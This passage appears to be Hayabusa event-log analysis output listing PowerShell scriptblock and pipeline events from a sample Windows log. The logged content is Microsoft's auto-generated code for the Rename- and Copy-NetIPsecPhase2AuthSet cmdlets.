[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 
+09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias 
'*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.562 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.565 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
